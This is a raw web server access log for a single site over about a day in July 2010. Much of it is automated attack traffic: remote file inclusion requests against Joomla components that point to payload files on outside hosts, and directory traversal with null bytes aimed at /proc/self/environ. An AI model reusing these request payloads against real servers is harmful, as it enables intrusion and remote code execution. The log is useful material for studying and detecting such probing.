89.108.64.192 - - [23/Jul/2010:17:14:42 -0700] "GET /logs/access_100703.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "virtualsupplynet.com"
89.108.64.192 - - [23/Jul/2010:17:14:42 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "virtualsupplynet.com"
89.108.64.192 - - [23/Jul/2010:17:14:43 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "virtualsupplynet.com"
216.18.213.162 - - [23/Jul/2010:17:29:43 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
216.18.213.162 - - [23/Jul/2010:17:33:07 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
89.108.64.192 - - [23/Jul/2010:17:48:50 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.virtualsupplynet.com"
89.108.64.192 - - [23/Jul/2010:17:48:51 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.virtualsupplynet.com"
77.88.31.246 - - [23/Jul/2010:18:24:46 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
175.180.214.81 - - [23/Jul/2010:21:27:16 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
72.55.153.180 - - [23/Jul/2010:21:52:53 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
72.55.153.180 - - [23/Jul/2010:21:52:53 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
72.55.153.180 - - [23/Jul/2010:21:52:55 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
88.198.183.48 - - [23/Jul/2010:21:54:39 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
88.198.183.48 - - [23/Jul/2010:21:54:45 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
88.198.183.48 - - [23/Jul/2010:21:54:45 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
118.160.142.138 - - [23/Jul/2010:22:05:45 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
72.55.153.180 - - [23/Jul/2010:22:10:53 -0700] "GET /logs/access_100703.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
72.55.153.180 - - [23/Jul/2010:22:10:53 -0700] "GET /logs/access_100703.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
72.55.153.180 - - [23/Jul/2010:22:10:53 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
72.55.153.180 - - [23/Jul/2010:22:10:53 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
72.55.153.180 - - [23/Jul/2010:22:10:53 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
72.55.153.180 - - [23/Jul/2010:22:10:53 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
72.55.153.180 - - [23/Jul/2010:22:10:56 -0700] "GET /logs/access_100703.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
72.55.153.180 - - [23/Jul/2010:22:10:56 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
72.55.153.180 - - [23/Jul/2010:22:10:56 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
88.198.183.48 - - [23/Jul/2010:22:17:56 -0700] "GET /logs/access_100703.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
88.198.183.48 - - [23/Jul/2010:22:17:56 -0700] "GET /logs/access_100703.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
88.198.183.48 - - [23/Jul/2010:22:17:56 -0700] "GET /logs/access_100703.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
88.198.183.48 - - [23/Jul/2010:22:17:56 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
88.198.183.48 - - [23/Jul/2010:22:17:57 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
88.198.183.48 - - [23/Jul/2010:22:17:57 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
88.198.183.48 - - [23/Jul/2010:22:17:57 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
88.198.183.48 - - [23/Jul/2010:22:17:57 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
88.198.183.48 - - [23/Jul/2010:22:17:57 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
216.18.213.162 - - [23/Jul/2010:22:26:39 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
216.18.213.162 - - [23/Jul/2010:22:38:32 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
112.105.115.71 - - [23/Jul/2010:22:42:23 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
216.18.213.162 - - [23/Jul/2010:22:45:31 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
112.105.117.175 - - [23/Jul/2010:23:40:03 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
117.53.96.161 - - [24/Jul/2010:00:10:24 -0700] "HEAD / HTTP/1.0" 200 0 "http://www.virtualsupplynet.com" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.virtualsupplynet.com"
118.170.206.250 - - [24/Jul/2010:00:27:40 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
112.104.177.8 - - [24/Jul/2010:00:32:21 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
116.30.161.110 - - [24/Jul/2010:00:46:01 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
77.88.31.246 - - [24/Jul/2010:01:17:33 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
112.105.117.175 - - [24/Jul/2010:01:24:49 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
175.180.214.81 - - [24/Jul/2010:01:35:28 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
114.41.27.85 - - [24/Jul/2010:02:02:01 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
77.78.97.82 - - [24/Jul/2010:02:08:32 -0700] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.virtualsupplynet.com"
77.78.97.82 - - [24/Jul/2010:02:08:32 -0700] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.virtualsupplynet.com"
77.78.97.82 - - [24/Jul/2010:02:08:32 -0700] "GET /logs/access_100417.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.virtualsupplynet.com"
77.78.97.82 - - [24/Jul/2010:02:10:39 -0700] "GET /logs/access_100522.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.virtualsupplynet.com"
87.229.26.132 - - [24/Jul/2010:02:12:35 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.tempat-respon-dan-spreader.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.virtualsupplynet.com"
87.229.26.132 - - [24/Jul/2010:02:12:35 -0700] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.tempat-respon-dan-spreader.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.virtualsupplynet.com"
95.108.151.244 - - [24/Jul/2010:02:32:45 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.virtualsupplynet.com"
95.108.151.244 - - [24/Jul/2010:02:32:45 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "virtualsupplynet.com"
95.108.151.244 - - [24/Jul/2010:02:32:47 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.virtualsupplynet.com"
95.108.151.244 - - [24/Jul/2010:02:32:48 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "virtualsupplynet.com"
95.108.151.244 - - [24/Jul/2010:02:32:50 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.virtualsupplynet.com"
95.108.151.244 - - [24/Jul/2010:02:32:51 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "virtualsupplynet.com"
114.38.66.134 - - [24/Jul/2010:02:48:47 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
114.44.15.46 - - [24/Jul/2010:03:10:30 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
93.232.214.130 - - [24/Jul/2010:03:22:25 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://wjw.kr/.bash_history/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
93.232.214.130 - - [24/Jul/2010:03:22:25 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://wjw.kr/.bash_history/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
93.232.214.130 - - [24/Jul/2010:03:22:25 -0700] "GET /logs/access_100206.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://wjw.kr/.bash_history/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
114.45.65.26 - - [24/Jul/2010:03:46:08 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
125.141.91.138 - - [24/Jul/2010:04:13:59 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.watpalelai.org/includes/PEAR/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
125.141.91.138 - - [24/Jul/2010:04:13:59 -0700] "GET /logs/access_100703.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.watpalelai.org/includes/PEAR/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
125.141.91.138 - - [24/Jul/2010:04:13:59 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.watpalelai.org/includes/PEAR/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
216.18.213.162 - - [24/Jul/2010:04:37:40 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
112.105.117.175 - - [24/Jul/2010:04:43:49 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
125.141.91.138 - - [24/Jul/2010:04:49:04 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
125.141.91.138 - - [24/Jul/2010:04:49:04 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
125.141.91.138 - - [24/Jul/2010:04:49:04 -0700] "GET /logs/access_100703.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
119.192.156.86 - - [24/Jul/2010:04:49:23 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
119.192.156.86 - - [24/Jul/2010:04:49:23 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
119.192.156.86 - - [24/Jul/2010:04:49:23 -0700] "GET /logs/access_100703.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
125.141.91.138 - - [24/Jul/2010:04:50:27 -0700] "GET /logs/access_100626.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
119.192.156.86 - - [24/Jul/2010:04:51:24 -0700] "GET /logs/access_100626.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
175.180.214.81 - - [24/Jul/2010:05:00:59 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
216.18.213.162 - - [24/Jul/2010:05:35:15 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
208.80.193.121 - - [24/Jul/2010:05:36:31 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.8.2; ZangoToolbar 4.8.3)" "virtualsupplynet.com"
118.170.206.250 - - [24/Jul/2010:06:05:51 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
114.24.43.82 - - [24/Jul/2010:06:28:26 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
83.93.131.189 - - [24/Jul/2010:06:43:26 -0700] "GET /logs//bbs/skin/daerew_45galleryGD//setup.php?dir=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/msh.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
83.93.131.189 - - [24/Jul/2010:06:43:26 -0700] "GET /bbs/skin/daerew_45galleryGD//setup.php?dir=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/msh.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
83.93.131.189 - - [24/Jul/2010:06:43:27 -0700] "GET /logs//bbs/skin/daerew_45galleryGD//setup.php?dir=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/msh.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
83.93.131.189 - - [24/Jul/2010:06:43:27 -0700] "GET /bbs/skin/daerew_45galleryGD//setup.php?dir=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/msh.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
112.105.117.175 - - [24/Jul/2010:06:44:30 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
175.180.214.81 - - [24/Jul/2010:07:05:30 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
112.104.200.95 - - [24/Jul/2010:07:15:27 -0700] "GET /logs/access_100612.log HTTP/1.1" 200 104934 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
117.103.56.20 - - [24/Jul/2010:07:43:56 -0700] "GET /logs/access_100703.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
117.103.56.20 - - [24/Jul/2010:07:43:56 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
117.103.56.20 - - [24/Jul/2010:07:43:57 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
117.103.56.20 - - [24/Jul/2010:07:46:21 -0700] "GET /logs/access_100703.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
117.103.56.20 - - [24/Jul/2010:07:46:21 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
117.103.56.20 - - [24/Jul/2010:07:46:22 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
216.18.213.162 - - [24/Jul/2010:07:53:42 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
114.43.130.241 - - [24/Jul/2010:08:16:43 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
77.88.31.246 - - [24/Jul/2010:08:49:01 -0700] "GET /logs/access.log HTTP/1.1" 200 21178 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
216.18.213.162 - - [24/Jul/2010:09:56:29 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
114.38.68.45 - - [24/Jul/2010:10:00:04 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
175.180.214.81 - - [24/Jul/2010:10:00:22 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
67.205.67.73 - - [24/Jul/2010:10:06:02 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
67.205.67.73 - - [24/Jul/2010:10:06:14 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
112.105.117.175 - - [24/Jul/2010:10:08:24 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
67.205.67.73 - - [24/Jul/2010:10:08:25 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
89.200.170.145 - - [24/Jul/2010:10:08:34 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
89.200.170.145 - - [24/Jul/2010:10:08:49 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
114.41.16.21 - - [24/Jul/2010:10:15:04 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
67.205.67.73 - - [24/Jul/2010:10:16:43 -0700] "GET /logs/access_100703.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
67.205.67.73 - - [24/Jul/2010:10:16:43 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
67.205.67.73 - - [24/Jul/2010:10:16:43 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
216.18.213.162 - - [24/Jul/2010:10:20:53 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
67.205.67.73 - - [24/Jul/2010:10:21:02 -0700] "GET /logs/access_100703.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
67.205.67.73 - - [24/Jul/2010:10:21:02 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
67.205.67.73 - - [24/Jul/2010:10:21:02 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
89.200.170.145 - - [24/Jul/2010:10:22:15 -0700] "GET /logs/access_100703.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
89.200.170.145 - - [24/Jul/2010:10:22:15 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
89.200.170.145 - - [24/Jul/2010:10:22:15 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
67.205.67.73 - - [24/Jul/2010:10:24:44 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
67.205.67.73 - - [24/Jul/2010:10:25:35 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
67.205.67.73 - - [24/Jul/2010:10:25:43 -0700] "GET /logs/access_100703.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
67.205.67.73 - - [24/Jul/2010:10:25:43 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
